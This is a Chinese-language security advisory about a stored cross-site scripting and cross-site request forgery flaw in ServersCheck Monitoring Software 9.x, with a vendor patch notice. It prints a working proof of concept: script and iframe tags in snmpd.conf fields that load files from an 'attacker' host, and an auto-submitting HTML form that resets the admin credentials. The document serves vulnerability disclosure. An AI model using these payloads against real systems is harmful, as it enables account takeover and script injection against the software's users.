ServersCheck Monitoring Software脚本插入漏洞

发布日期:2012-10-12
更新日期:2012-10-16

受影响系统:
ServersCheck Monitoring Software ServersCheck Monitoring Software 9.x
描述:
--------------------------------------------------------------------------------
ServersCheck Monitoring Software是网络监控和服务器监控软件。

ServersCheck Monitoring Software存在安全漏洞,通过"syslocation" 、"syscontact"参数传递的输入没有正确过滤即显示给用户,可被利用插入任意HTML和脚本代码。

<*来源:loneferret
 
  链接:http://secunia.com/advisories/50959/
        http://www.exploit-db.com/exploits/21866/
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# PoC:
# Store XSS & Cross Site Request Forgery
# The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
# JavaScript file.
# ..
# syslocation <script src="http://attacker/xss.js"></script>
# syscontact <iframe src="http://attacker/scheck-csrf.html"></iframe>

# CSRF PoC:
# We can also use the previous XSS to trigger this. Makes for a funny.
# Change Admin credentials
# File scheck-csrf.html
<html>
<body onload="trigger()">
<script>
        function trigger() {
                document.getElementById('bad_form').submit();
        }
</script>
<form id="bad_form" method="post" action="http://target:1272/settings2.html">
  <input name="systemsetting" value="secure" type="hidden">
  <input name="setting" value="SECURE" type="hidden">
  <input value="ok" name="changedsettings" type="hidden">
  <input name="systemsetting" value="SECURE" type="hidden">
  <input name="XYXadminuser" size="30" value="loneferret" type="hidden"><br>
  <input name="adminpass" size="30" value="123456" type="hidden"><br>
</form>
</body>
</html>

建议:
--------------------------------------------------------------------------------
厂商补丁:

ServersCheck Monitoring Software
--------------------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.serverscheck.dk/monitoring_software/release.asp

xss

相关推荐